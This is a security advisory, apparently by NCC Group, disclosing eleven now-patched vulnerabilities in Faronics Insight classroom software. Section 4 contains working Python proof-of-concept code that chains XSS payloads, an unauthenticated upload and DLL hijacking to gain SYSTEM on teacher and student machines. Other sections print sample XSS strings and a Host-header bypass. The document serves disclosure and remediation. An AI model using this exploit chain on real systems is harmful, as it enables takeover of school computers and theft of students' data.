As of Insight v11.23.x.289, these vulnerabilities have been fixed. Faronics’
release notes can be found here.


1. NUMEROUS DLL HIJACKING VULNERABILITIES IN TEACHER AND STUDENT CONSOLES

Risk: High (8.2 CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H)


SUMMARY

The Teacher Console Server and Student Console Agents both attempt to load a
variety of system DLLs in an unsafe manner.


IMPACT

Because the Teacher Console Server and Student Console Agent processes both
execute as the SYSTEM user, total system compromise can be achieved when a
malicious DLL is loaded inadvertently.


DETAILS

Windows applications make use of Dynamically Linked Libraries (DLL) files to add
or reference additional functionality exposed by those DLLs. DLL files are
typically loaded when applications first start up, and the application typically
knows precisely where the DLL files are located in order to load them as quickly
as possible.

In cases where the DLL file’s path is not hardcoded (“sas.dll” as opposed to
“C:\Windows\System32\sas.dll” for example), Windows will look for the file in a
specific order –

 * The directory the application is being loaded from
 * The C:\Windows\system32 directory
 * The C:\Windows directory
 * The directories located in the PATH environment variable.

This is generally sufficient, because developer-supplied DLLs should be loaded
from the same directory that the application runs from.

During this vulnerability research, it was observed that both the Student
Console agent and the Teacher Console server attempt to load Microsoft system
DLLs from the application’s installation directory, as this screenshot from
ProcMon demonstrates –



The screenshot above shows three instances where FITeacherSVC.exe (which runs as
SYSTEM) attempts to load a system DLL from the current working directory rather
than the intended directory.

Combined with the other vulnerabilities identified in this application during
this vulnerability research, it was possible to place a malicious “sas.dll” into
the “C:\Program Files\Faronics\Insight Teacher” (and Insight Student) directory,
granting code execution on the next Faronics Insight restart.

Overall the following system DLLs are being loaded unsafely in the student and
teacher consoles –

 * WTSAPI32.dll
 * sas.dll
 * USERENV.dll
 * WINSTA.dll
 * Profapi.dll
 * Dbghelp.dll
 * IPHLPAPI.dll
 * WINMM.dll
 * CRYPTBASE.DLL
 * Powrprof.dll
 * UMPDC.dll
 * Sspicli.dll
 * Node.dll


RECOMMENDATION

System DLLs, which are guaranteed to be present inside the Windows system
directories (C:\Windows, C:\Windows\SYSTEM32), should have their include paths
hardcoded. Instead of linking to, for example, “sas.dll” in the build
environment, it is safer to link to “C:\Windows\System32\sas.dll” directly.


2. SYSTEMIC STORED AND REFLECTED CROSS SITE SCRIPTING FLAWS (CVE-2023-28350)

Risk: High (8.7 CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:C/C:L/I:H/A:H)


SUMMARY

Attacker supplied input is not validated/sanitized prior to being rendered in
both the Teacher and Student Console applications, enabling the attacker to
execute JavaScript in these applications.


IMPACT

Due to the rich and highly privileged functionality offered by the Teacher
Console, the ability to silently exploit Cross Site Scripting (XSS) on the
Teacher’s machine enables RCE on any connected student machine (and the
teacher’s machine).


DETAILS

Cross Site Scripting (XSS) is a vulnerability category commonly found in web
applications. The vulnerability occurs when applications accept user supplied
input and then render it directly on a webpage without first sanitizing it /
ensuring that it is safe. When unsanitized user input is rendered in a web
application it can frequently be used to execute JavaScript in a victim’s
browser.

Both the Teacher and Student Insight UI applications are “Electron”
applications, meaning that they are effectively rich JavaScript-based web
applications embedded inside of an executable file. Because Electron apps are
essentially web applications, they are especially vulnerable to XSS
vulnerabilities and significant attention must be paid to input validation.

During this vulnerability research, NCC Group researchers observed that there is
almost no input validation present across either of the Insight UI applications,
allowing for trivial compromise via XSS.

Some of the many identified XSS vectors are listed below –

 * Keystroke logs
 * Student device login names
 * Student desktop names
 * Class ID
 * Quiz names
 * Chat messages*

It is worth noting that some of the above XSS vectors are only exploitable by
HTTP POSTing malicious data directly to the API, from where it is rendered
unsafely in the UI. In general, the only barrier to storing malicious payloads
through the UI is field length restrictions, rather than any input validation in
the UI.

“Chat messages” above is marked with an asterisk because chat messages are
generally sanitized; however, it was observed that messages containing “<b>
</b>”, “<a> </a>” and “<i> </i>” are not sanitized (presumably to enable
formatted messages between teacher and student) and are therefore exploitable
by sending malicious messages such as “<b> </b><script>alert("NCC Group
XSS");</script>”. A slightly more sophisticated example of this in action can be
seen below –



As noted above in the impact statement, the lack of input sanitization in the
Faronics Insight product is especially dangerous because the product exposes
numerous JavaScript functions which can be used to transfer files to / from
various machines, start / stop executables on student machines, uninstall the
insight product, software-lock workstations etc.


RECOMMENDATION

When rendering user submitted data in either the Student or Teacher console,
encode the output based on the appropriate context of where the output is
included. Content placed into HTML needs to be HTML-encoded, for example. To
work in all situations, HTML encoding functions should encode the following
characters: single and double quotes, backticks, angle brackets, forward and
backslashes, equals signs, and ampersands.

An additional line of defense is to perform validation on both the presentation
tier, in the client-side JavaScript, and on the server-side, in the Express
server. Validating input in both tiers of the application will help to ensure
that users cannot simply circumvent client side controls by simply submitting
malicious payloads to the server.
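The two controls just recommended, context-aware output encoding and server-side validation, as an added example in Node-style JavaScript to match the Electron/Express stack of the consoles. This is not Faronics’ or the advisory’s code. The field names follow the “updateSTAgentStatus” payload reproduced later in this advisory; the length limits and character allow-lists are assumptions chosen for illustration:

```javascript
// Added example, not code from Faronics Insight or from the advisory. It shows the two
// controls the recommendation describes: context-aware HTML encoding and server-side
// allow-list validation. Field names follow the advisory's updateSTAgentStatus payload;
// the length limits and character allow-lists are assumptions for illustration.

const HTML_ESCAPES = {
  '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#x27;',
  '`': '&#x60;', '/': '&#x2F;', '\\': '&#x5C;', '=': '&#x3D;',
};

// Encode a value for insertion into an HTML text or quoted-attribute context. Every
// character the recommendation lists is replaced in a single pass, so the output
// cannot be re-interpreted as markup or as an attribute/tag boundary.
function htmlEncode(value) {
  return String(value).replace(/[&<>"'`\/\\=]/g, (ch) => HTML_ESCAPES[ch]);
}

// Server-side rules for fields the advisory identifies as XSS vectors (assumed limits).
const FIELD_RULES = {
  loggedInUser:  { max: 104, pattern: /^[A-Za-z0-9._@\\ -]+$/ }, // DOMAIN\user or user@domain
  hostName:      { max: 63,  pattern: /^[A-Za-z0-9-]+$/ },       // NetBIOS/DNS host label
  classId:       { max: 64,  pattern: /^[A-Za-z0-9 _-]+$/ },
  preferredName: { max: 64,  pattern: /^[A-Za-z0-9 ._-]*$/ },    // may be empty
};

// Validate an updateSTAgentStatus body before it is stored or forwarded to the UI.
// Returns a list of problems; an empty list means every checked field is acceptable.
function validateAgentStatus(payload) {
  const problems = [];
  for (const [field, rule] of Object.entries(FIELD_RULES)) {
    const value = payload ? payload[field] : undefined;
    if (typeof value !== 'string') {
      problems.push(`${field}: missing or not a string`);
      continue;
    }
    if (value.length > rule.max) problems.push(`${field}: longer than ${rule.max} characters`);
    if (!rule.pattern.test(value)) problems.push(`${field}: contains disallowed characters`);
  }
  return problems;
}

// Render a student tile for the Teacher Console. Even if validation were bypassed,
// each user-controlled field is encoded for the context it lands in.
function renderStudentTile(status) {
  return `<div class="student" data-host="${htmlEncode(status.hostName)}">` +
         `<span class="user">${htmlEncode(status.loggedInUser)}</span>` +
         `<span class="class">${htmlEncode(status.classId)}</span></div>`;
}
```

The validator rejects a “loggedInUser” of `<script>…</script>` on the server before it is ever stored, and the renderer encodes every field regardless, so either layer on its own defeats the payloads shown in this advisory; relying on only the client-side layer is what the recommendation warns against.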


3. RCE AS SYSTEM VIA UNAUTHENTICATED FILE UPLOAD API (CVE-2023-28353)

Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)


SUMMARY

An unauthenticated attacker is able to upload any type of file to any location
on the Teacher Console’s computer, enabling a variety of different exploitation
paths including code execution. It is also possible for the attacker to chain
this vulnerability with other identified (and disclosed) vulnerabilities to
cause a deployed DLL file to immediately execute as SYSTEM.


IMPACT

A remote unauthenticated attacker can gain code execution as SYSTEM on the
teacher’s computer. SYSTEM is the highest privilege level in Windows, so this
constitutes a total system compromise.


DETAILS

The Faronics Insight teacher application contains functionality which is able to
force student devices to upload files from a given folder on their machine. This
functionality operates as follows –

 * Teacher Console sends an “uploadstudentfile” WebSocket message to a given
   Student Console
   * This message contains the source path, source file name and destination on
     the Teacher Console to save the file to.
 * Student Console sends the file over an unauthenticated HTTP POST multipart
   request, complete with the downloaded file, file name and destination path
 * The ‘FITeacherServer.exe’ process (which runs as SYSTEM) writes the file to
   the destination path, anywhere on disk.

It was observed as part of this vulnerability research that a network connected
attacker with knowledge of a student’s agent ID, which is trivial to obtain by
abusing Faronics’ UDP broadcast discovery mechanism, is able to send arbitrary
files to this API endpoint and deploy them anywhere on the teacher’s disk.

At this point there are clearly numerous different ways that this could be
abused to obtain privileged code execution, ranging from deploying the file to
an administrator’s “Startup” directory to overwriting any number of files under
C:\Windows\System32 to achieve persistence as SYSTEM.

NCC Group researchers instead chose to chain three vulnerabilities in Faronics
Insight together to achieve a more immediate RCE as SYSTEM –

 1. Upload a malicious copy of “sas.dll” to “C:\Program Files\Faronics\Insight
    Student” using the API
 2. Leverage the “Fake Student Console” zero click XSS vulnerability to call
    “<script>relaunchInsight();</script>”, restarting the Teacher Console
    process
 3. Leverage the DLL hijacking vulnerability such that when Insight relaunches,
    it attempts to load the malicious “sas.dll” DLL file and executes the
    malicious code within as SYSTEM.

The following screenshot demonstrates the result of this exploit chain, that a
new administrator named OLIVER_BROOKS_NCC2 was created –




RECOMMENDATION

NCC Group recommends that additional access controls are implemented which
restrict an unauthorized/unauthenticated attacker from submitting files to the
API. These access controls could be implemented by requiring valid Student
Consoles to submit a valid session ID cookie with every HTTP request.

NCC Group recommends that the Teacher Console is updated to restrict file
uploads to a particular directory. This will help to ensure that, in the event
of a Student Console compromise, an attacker is unable to persist files in
arbitrary locations on the Teacher’s file system.

Finally, NCC Group recommends that some consideration is given to the principle
of least privilege. If “FITeacherServer.exe” could function correctly when
executed as a lower privileged user, it would be safer to do so; this would
greatly lower the severity of any code execution vulnerabilities which emerge in
the future.


4. RCE AS SYSTEM VIA ARTIFICIAL STUDENT CONSOLE AND XSS (CVE-2023-28347)

Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)


SUMMARY

It is possible for an attacker to create a proof of concept script which
functions similarly to a Student Console, providing unauthenticated attackers
with the ability to exploit XSS vulnerabilities within the Teacher Console
application and gain RCE in a ‘Zero Click’ manner.


IMPACT

Due to the rich and highly privileged functionality offered by the Teacher
Console, the ability to silently exploit XSS on the Teacher Machine enables
remote code execution on any connected student machine (and the teacher’s
machine).


DETAILS

NCC Group researchers observed that, in the default installation configuration,
the Teacher Console application contains no authentication or authorization
logic when allowing Student Consoles to connect. Because of this, it is possible
for an attacker to create their own “Student Console” like application which is
purpose-built to exploit flaws in the Teacher Console and connected Student
Consoles.

As noted in the Technical Advisory named “RCE as SYSTEM via Artificial Teacher
Console”, after going through the UDP handshake process, Student Consoles
automatically open a WebSocket connection with the Teacher Console and begin
receiving instructions.

NCC Group researchers also observed that when a malicious (artificial) Student
Console is created, it is possible to exploit a Cross Site Scripting
vulnerability in the “loggedInUser” field of the initial “updateSTAgentStatus”
call. The Teacher Console simply renders whatever “loggedInUser” field is
provided straight into the DOM and any JavaScript in that field is immediately
executed without any user interaction.

As such, a small proof of concept exploit was developed which performs the
following steps –

 * Abuses the UDP broadcast API to get all active student IDs
 * Abuses the UDP broadcast API to get the teacher’s IP and ID
 * Uploads a malicious DLL file to the teacher’s machine using the
   “/api/uploadFiles” endpoint
 * Creates a WebSocket connection to the Teacher Console
 * For every active student, it submits a malicious “updateSTAgentStatus” HTTP
   request to the teacher which contains the following XSS payload –

# Start compromising all students.
for student in studentIDs:
    # Inspiration for this exploit from teacher.js line 12213
    # Send the DLL to the students
    json={
        "macAddresses":"00:00:00:00:00:00",
        "ipAddresses":"999.999.999.999",
        "loggedInUser":"<script>sendActionOnSocket({type: 1,handlerFuncName : \"updateAgent\",data: {fileName:\"../../../../Program Files/Faronics/Insight Student/sas.dll\", downloadFilePath:\"/installers/sas.dll\"}, targets: [\""+student+"\"]});</script>",
        "os":"windows",
        "hostName":"DESKTOP-irrelevant",
        "limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
        "lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
        "monitorCount":1,
        "screenSharingAllowed":True,
        "isUserLoggedIn":True,
        "canChangePreferredName":True,
        "hasMic":True,
        "version":"11.21.2100.262",
        "agentId":desiredMachineID.decode("ascii"),
        "classId":"Class101","preferredName":""
    }

    requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)


Observe that within the “loggedInUser” field is a JavaScript payload which
compels a Student Console to execute the “updateAgent” command by retrieving the
malicious “sas.dll” file and deploying it to the Faronics Insight installation
directory. The proof of concept then abuses the XSS vulnerability again to force
all connected Student Consoles to restart using the “restartInsightAgent”
command –

    # Brief pause, still inside the loop over studentIDs above
    time.sleep(3)

    # Instruct the students to restart insight, causing the DLL to be loaded and execute, creating a new user (OLIVER_BROOKS_NCC2:FaNcYfEaSt%2)
    json={
        "macAddresses":"00:00:00:00:00:00",
        "ipAddresses":"999.999.999.999",
        "loggedInUser":"<script>sendActionOnSocket({type: 1,handlerFuncName : \"restartInsightAgent\",targets: [\""+student+"\"]});</script>",
        "os":"windows",
        "hostName":"DESKTOP-irrelevant",
        "limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
        "lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
        "monitorCount":1,
        "screenSharingAllowed":True,
        "isUserLoggedIn":True,
        "canChangePreferredName":True,
        "hasMic":True,
        "version":"11.21.2100.262",
        "agentId":desiredMachineID.decode("ascii"),
        "classId":"Class101","preferredName":""
    }

    requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)


At this point, code execution as SYSTEM has been achieved on every connected
student’s machine.

Finally, the script uploads the same malicious DLL file to the teacher’s
Faronics Insight installation directory and compels the Teacher Console to
restart by abusing the XSS vulnerability –

# All students are compromised at this point, now we get RCE on the teacher too using the same trick
# Step 4: Send the DLL again and put it in the Insight Teacher directory to get RCE on the teacher
sharedCode.sendFileToTeacher(teacherIP, desiredMachineID.decode("ascii"), localPath, "C:\\Program Files\\Faronics\\Insight Teacher\\", True)

# Quick sleep to make sure everything's planted correctly.
time.sleep(3)

# Step 5: Use XSS to trigger a restart on the teacher machine using the relaunchInsight(); Javascript function
json={
    "macAddresses":"00:00:00:00:00:00",
    "ipAddresses":"999.999.999.999",
    "loggedInUser":"<script>relaunchInsight();</script>",
    "os":"windows",
    "hostName":"DESKTOP-irrelevant",
    "limiting":{"web":0,"apps":0,"print":0,"drives":0,"lockScreen":0,"muteSpeaker":0,"lockKbdM":0},
    "lastKnownState":{"assessmentMode":0,"handRaised":0,"monitorIndex":0},
    "monitorCount":1,
    "screenSharingAllowed":True,
    "isUserLoggedIn":True,
    "canChangePreferredName":True,
    "hasMic":True,
    "version":"11.21.2100.262",
    "agentId":desiredMachineID.decode("ascii"),
    "classId":"Class101","preferredName":""
}

requests.post(f"http://{teacherIP}:8890/api/updateSTAgentStatus/{desiredMachineID.decode('ascii')}", json=json)

# Step 6: cleanup and be stealthy
# Not yet implemented

sio.disconnect()


At this point, RCE has been achieved on the teacher’s machine and every
connected student’s machine by abusing a zero-click XSS vulnerability.

It should be noted, however, that the artificial Student Console could be
amended to abuse the XSS vulnerability in any number of ways, including scraping
all active Student Console’s file systems and overwriting critical system files
to achieve a persistent Denial of Service.


RECOMMENDATION

As noted in the other provided Technical Advisories in this bundle, NCC Group
strongly recommends that the Teacher Console is updated to require
authentication from any Student Console, including requiring a valid session
cookie or JWT with every HTTP request from a Student Console.

Requiring authentication with every request will help to mitigate this
vulnerability, because it will remove an attacker’s ability to create and
operate artificial Student Consoles.


5. RCE AS SYSTEM VIA ARTIFICIAL TEACHER CONSOLE (CVE-2023-28349)

Risk: Critical (9.6 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)


SUMMARY

It is possible for an attacker to create an exploit which functions similarly to
the Teacher Console, which compels Student Consoles to connect and exploit
themselves automatically.


IMPACT

Remote attackers are able to gain covert remote code execution and surveillance
capabilities on student machines by masquerading as a valid Teacher Console.


DETAILS

As part of this vulnerability research, researchers spent some time analysing
how Student Consoles and Teacher Consoles connect to one another in the default
configuration. The following steps were observed before any connection is made.

 1. The Student Console Windows service (FIStudentSvc.exe) starts, which starts
    the Student Agent (FIStudentAgent.exe) as SYSTEM
 2. The Teacher Console Windows service (FITeacherSvc.exe) is started, which
    starts the Teacher Server (FITeacherServer.exe) as SYSTEM
 3. The Teacher Server begins making periodic “DISCO” (discovery) UDP broadcasts
    to 255.255.255.255 on port 8889 indicating that the teacher console is
    available
 4. All active Student Agent applications respond directly to those broadcasts
    with a UDP RESP (response) packet. The RESP packet contains their “agent
    ID”, a unique UUID-like identifier for that Student.
 5. The Teacher then sends a UDP START packet to the student, which compels them
    to automatically perform the following four steps –
    * Make a HTTP request to the Teacher Console at “/api/getClassSettings” to
      obtain some basic settings about the class
    * Make a HTTP request to “/api/updateSTAgentStatus” to provide the Teacher
      with some basic details about the Student Console
    * Make a HTTP request to the Teacher at the “/socket.io/” endpoint to start
      a Websocket session where the Teacher Console Command and Control is
      performed
    * Make repeated HTTP requests to the API endpoints at
      “/api/uploadscreenshots” and “/api/appKeystrokeLogs” which provide the
      Teacher Console with an image of the student’s desktop and a running
      record of every key that the student types.

At no point during the above sequence of operations is any kind of cryptographic
handshake performed to ensure the validity of a Teacher Console; the Student
Console is compelled to connect and begin divulging keylogger data and
screenshots simply by virtue of being sent the UDP “START” packet.

Once the WebSocket connection is set up, a Teacher Console can begin sending
commands to the student desktop like “downloadFile”, “launchApp” and
“restartInsight”. Having the ability to compel a Student Console to execute
these commands paves the way for arbitrary file write and RCE as SYSTEM.

NCC Group researchers created a proof of concept which sends the DISCO UDP
broadcast, sends a START packet to any student which responds and then spins up
a websocket / HTTP server to handle all requests from the connecting Student
Console. The proof of concept then deploys “sas.dll” to the Faronics Student
installation directory, commands the application to restart with the
“restartInsight” WebSocket command and achieves RCE as SYSTEM using the DLL
hijacking vulnerability described in the DLL Hijacking technical advisory.


RECOMMENDATION

NCC Group strongly recommends that the initial UDP broadcast challenge/response
system is amended to include some form of cryptographic handshake, using either
a pre-shared key which is set at application install time for both the Teacher
Console and Student Consoles, or a keypair which both Student and Teacher
Consoles obtain from a Faronics cloud API and use for authentication. If the
Student Console were able to verify that it is connecting to a legitimate
Teacher Console by decrypting a “challenge” in the DISCO packet and sending an
encrypted “response” in the RESP packet, then this vulnerability would be
immediately mitigated.


6. ALL DATA TRANSMITTED IN PLAINTEXT ENABLING MITM (CVE-2023-28348)

Risk: High (7.1 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N)


SUMMARY

Data transmitted between Student Consoles and Teacher Consoles is sent over
plaintext HTTP and plaintext WebSockets.


IMPACT

A suitably positioned attacker could perform a person-in-the-middle attack on
either a connected student or teacher and intercept student keystrokes or modify
executable files being sent from teachers to students.


DETAILS

The Faronics Insight application allows teachers (running the Teacher Console)
to administer student devices (running the Student Console). The Teacher Console
compels Student Consoles to perform various activities by sending commands over
WebSockets; the Student Console responds to these commands either directly over
the WebSocket or using the HTTP API exposed by the Teacher Console on port 8890.

Because neither the webserver nor the WebSocket server utilize TLS, it is
possible for an attacker to perform a classic ‘person-in-the-middle’ attack to
intercept, monitor and manipulate communications between teachers and students.


RECOMMENDATION

NCC Group recommends that Faronics ensures that all API traffic and WebSocket
traffic is sent over HTTPS and TLS enabled WebSockets. Socket.IO (the WebSocket
library used by this application suite) supports TLS out of the box according to
the documentation.


7. ENHANCED SECURITY MODE MAY BE BYPASSED (CVE-2023-28352)

Risk: High (8.8 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)


SUMMARY

Every vulnerability identified within this bundle of Technical Advisories can be
exploited successfully even when Enhanced Security Mode is enabled.


IMPACT

An attacker-controlled artificial Student Console can connect to and attack a
Teacher Console even after Enhanced Security Mode has been enabled.


DETAILS

The Faronics Insight Teacher and Student Consoles expose a feature called
“Enhanced Security”, which can be enabled either at install time or at runtime.
This functionality is intended to prevent arbitrary Student Consoles from being
able to connect to a class, as well as to prevent arbitrary Teacher Consoles
from presenting themselves and compelling Student Consoles to join them.

The Enhanced Security functionality forms an effective security measure against
unmodified and legitimate Consoles. If a Student Console and Teacher Console do
not have the same Enhanced Security key, a student will not be able to join a
teacher, and a teacher will not be able to compel a student to join.

As can be seen in Wireshark, when Enhanced Security mode is enabled on both
Consoles but their keys differ, the two Consoles are unable to discover each
other via UDP broadcasts –

It appears that this functionality works by including an encoded or encrypted
section in the UDP broadcasts, which the other party can only decode if its
key matches.



As part of this vulnerability research, NCC Group researchers observed that if
UDP DISCO / RESP / START broadcast packets were simply transmitted without the
encoded payload by an artificial Teacher or Student Console then both students
and teachers would respond to them, allowing the malicious Console to complete
the handshake successfully and either compel Student Consoles to connect or to
successfully connect to a Teacher Console as appropriate.

Because of this, each of the supplied Technical Advisories remains valid, and
each of the developed proof-of-concept scripts executes successfully, even when
Enhanced Security mode is enabled.


RECOMMENDATION

NCC Group recommends that the Enhanced Security mechanisms are updated in both
the Teacher and Student Consoles such that if a UDP broadcast is received which
doesn’t contain the encoded portion then it is simply ignored. This will act as
an effective mitigation against malicious Teacher Consoles compelling Student
Consoles to connect.

NCC Group also recommends that the Teacher Console is updated to validate that
connections are being made from a Student Console which both has Enhanced
Security enabled and has the correct Enhanced Security key set. This could be
validated, for example, via an HTTP header containing an encrypted and encoded
payload.


8. VIRTUAL HOST ROUTING CAN BE DEFEATED (CVE-2023-28346)

Risk: Low (2.8 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N)


SUMMARY

It is possible for a remote attacker to communicate with the private API
endpoints exposed on “/login”, “/consoleSettings”, “/console” etc. despite
Virtual Host Routing being used to block this access.


IMPACT

Remote attackers can interact with private pages on the webserver, enabling them
to perform privileged actions such as logging into the console and changing
console settings if they have valid credentials.


DETAILS

The Faronics Insight Teacher Console exposes an HTTP server on port 8890. The
server offers a set of public API endpoints under “/api/*” which don’t require
any authentication. These endpoints are used by Student Consoles to transmit
data back and forth from the Teacher Console.

The webserver on port 8890 also exposes another set of endpoints such as
“/login”, “/consoleSettings”, “/console” which are only accessible if the user
attempts to access them using, for example, http://127.0.0.1:8890 or
http://localhost:8890. Attempts to communicate with the webserver remotely are
blocked with a 404 error.

During this vulnerability research, it was identified that it’s possible to
supply an HTTP “Host” header with a value of “localhost:8890” in order to defeat
this control and access the console remotely. Defeating the Virtual Host Routing
control enables any network-connected attacker to begin auditing and attacking
the product as if they were situated on localhost.


RECOMMENDATION

NCC Group anticipates that Faronics developers are likely using a library such
as VHost as Virtual Host Routing middleware for Express. In addition to using
such middleware, NCC Group suggests that each of the private (localhost-only)
API endpoints implement a check to ensure that the IP address of the HTTP
requestor is either “localhost” or “127.0.0.1”.

An alternative solution, which requires more extensive architectural changes,
would be to set up a second webserver which hosts the private API endpoints,
configured to only listen for HTTP traffic from localhost.


9. KEYSTROKE LOGS ARE STORED IN PLAINTEXT IN A WORLD READABLE DIRECTORY
(CVE-2023-28351)

Risk: Medium (6.5 CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N)


SUMMARY

Every keystroke made by any user on a computer with Faronics Insight Student
installed is logged to a world readable directory.


IMPACT

An attacker with physical or local access to a computer with Faronics Insight
installed can trivially extract the plaintext keystrokes of any student who has
used the machine, potentially enabling them to obtain PII and/or to compromise
personal accounts owned by the victim.


DETAILS

The Faronics Insight Student Console application silently logs every keystroke
made by a user. These keystroke logs are periodically transmitted as a JSON
payload over a plaintext WebSocket to the Teacher Console, where they are made
available for the teacher to view.

During this vulnerability research, it was observed that the keystroke logs are
stored in “C:\ProgramData\Faronics\Insight\Data\KeyLogs”, a world readable
folder where every individual plaintext keystroke log is readable by any user on
the Student Console machine.

It’s unclear how long these log files remain present in this directory before
they are purged, but their presence on the machine constitutes a threat to the
privacy of the users whose keys are being logged by Faronics Insight.


RECOMMENDATION

NCC Group recommends that all keystroke logging activity is performed in memory
as opposed to storing files on disk, so that after keystrokes are transmitted to
the Teacher Console there is no trace of the keystroke logs remaining on disk.
Alternatively, if the logs must be kept on disk for a short amount of time, then
the “C:\ProgramData\Faronics\Insight\Data\KeyLogs” directory must have its
permissions restricted such that only an administrator or SYSTEM can access
them. Additionally, the files should be encrypted at rest in order to help
protect the student’s privacy.


10. LACK OF ACCESS CONTROLS ON STUDENT APIS (CVE-2023-28344)

Risk: Medium (6.5 CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)


SUMMARY

The Insight Teacher Console application allows unauthenticated attackers to view
constantly updated screenshots of student desktops and to submit falsified
screenshots on behalf of students.


IMPACT

Attackers are able to view screenshots of student desktops without their
consent. These screenshots may potentially contain sensitive/personal data.
Attackers can also rapidly submit falsified images, hiding the actual contents
of student desktops from the Teacher Console.


DETAILS

Student Consoles submit screenshots over HTTP POST to the Teacher Console’s
webserver on the API endpoint at “/api/uploadscreenshot/agent_id”, where
agent_id is the unique UUID-like string which uniquely identifies a connected
student’s Console.

By default, Student Consoles will silently transmit a screenshot of the
student’s desktop to the teacher every few seconds. The Teacher Console then
retrieves these screenshots via HTTP GET from
“/uploads/screenshots/agent_id.jpeg” and renders them in the Console. The API
endpoint at “/uploads/screenshots/agent_id.jpeg” requires no authentication or
authorization to view the uploaded images. Because of this, a network-connected
attacker is able to obtain the images simply by navigating to the correct URL
for a given agent ID.

Exposing these images to anyone on the network may inadvertently leak a
student’s Personally Identifiable Information (PII) to anyone who is able to
guess or otherwise determine the student’s agent ID.

Additionally, because Student Consoles submit their screenshots reasonably
quickly and because the Teacher API has no rate limiting measures in place, it
is possible for an attacker to query the API rapidly and repeatedly in order to
obtain a low framerate “video” feed of the student’s device.

In addition to a lack of access controls on the screenshot-retrieval API, there
is also no access control present on the API endpoint which allows students to
submit screenshots to the server (“/api/uploadscreenshot/agent_id”).

Lack of access controls on this API endpoint allows any network connected user
to send images to the Teacher Console on behalf of a victim Student Console.
When the Teacher Console receives these images it then immediately renders them
instead of the targeted student’s actual desktop.

In addition to the above two access control lapses, there is also no access
control present on the API endpoint which enables Student Consoles to upload the
keystrokes that they’ve logged from users. Lack of access control on this API
endpoint enables an attacker to submit arbitrary keystrokes to the API on behalf
of a student, allowing them to decrease the quality of the logged keystrokes.


RECOMMENDATION

NCC Group recommends that the API is updated to only return student device
screenshots when HTTP requests originate from localhost. This way, the
screenshots will not be available to users who attempt to interact with the API
remotely.

Additionally, NCC Group recommends that access controls are implemented to
prevent arbitrary users from submitting screenshots on behalf of students.
Finally, as a general recommendation for the entire application, NCC Group
recommends that the Teacher Console is updated to require that a unique session
ID be provided with every HTTP request from Student Consoles. A unique session
ID, combined with TLS, will help to ensure that requests from student consoles
are legitimate.


11. TEACHER CONSOLE CREDENTIALS EXPOSED VIA API ENDPOINT (CVE-2023-28345)

Risk: Medium (4.0 CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N)


SUMMARY

The Insight Teacher Console application exposes the teacher’s Console password
in plaintext via an API endpoint accessible from localhost.


IMPACT

Attackers with physical access to the Teacher Console can open a web browser,
navigate to the affected endpoint and obtain the teacher’s password. This
enables them to log into the Teacher Console and begin trivially attacking
student machines.


DETAILS

The Faronics Insight Teacher Console exposes an HTTP server on port 8890. One of
the API endpoints available only when making requests to the API from localhost
is “/consoleSettings”. This API endpoint returns basic configuration details
about the Teacher Console –



Included within this response is the teacher’s password in plaintext (along with
the license key and console versions). Exposing this data in plaintext via the
API enables an attacker with physical access to retrieve the teacher’s
credentials and log in to the Teacher Console.

Because the Teacher Console enables teachers to remotely control student
machines via a pseudo-VNC, access to the Teacher Console enables an attacker to
trivially compromise any connected student machine.

Because of the flaws highlighted in the Technical Advisory named “Virtual Host
Routing Can Be Defeated”, any network connected attacker can connect to this API
endpoint and obtain these credentials.


RECOMMENDATION

NCC Group recommends against exposing credentials and license keys via API
endpoints. As such, the “consoleSettings” API endpoint should be reconfigured to
return a minimal set of configuration data to remove this attack vector.

If there is an unavoidable requirement to expose the credentials via this API
endpoint, NCC Group strongly recommends that the data is first encrypted and
then encoded with base64. This will require a small modification to enable API
consumers to decrypt that data, but it will slightly reduce the risk of
compromise.


DISCLOSURE TIMELINE

 * 02/01/2023 – First contact with vendor to set up a secure channel to share
   the vulnerabilities
 * 02/01/2023 – Technical Advisories submitted to Faronics
 * 02/23/2023 – Contact re-established with Faronics to check how the fixes were
   progressing
 * 03/03/2023 – Re-established contact to set a firm disclosure date of April
   28th
 * 03/14/2023 – CVE numbers assigned and shared with Faronics
 * 04/28/2023 – Contact made with Faronics to query the status of the fixes
 * 05/01/2023 – Faronics indicated that the disclosure date would be missed, a
   QA build would be coming soon
 * 05/03/2023 – A QA build of Faronics Insight was given to NCC Group to
   validate the fixes
 * 05/04/2023 – The QA build was confirmed to have mitigated all of the
   identified vulnerabilities
 * 05/17/2023 – Reached out to Faronics once again to enquire about their
   readiness to release the patch
 * 05/17/2023 – Faronics publishes v11.23.x.289 containing fixes (release notes)


THANKS TO

I would like to praise the Faronics team on their professionalism,
responsiveness and the commitment to the security of their product.

I would also like to thank Jeremy Boone, an NCC Group Technical Director, for
his QA efforts and for always patiently answering any silly question which I
pose to him.

Finally I’d like to thank my colleague Julian Yates for his QA efforts, and for
being an excellent sounding board during this vulnerability research.


ABOUT NCC GROUP

NCC Group is a global expert in cybersecurity and risk mitigation, working with
businesses to protect their brand, value and reputation against the
ever-evolving threat landscape. With our knowledge, experience and global
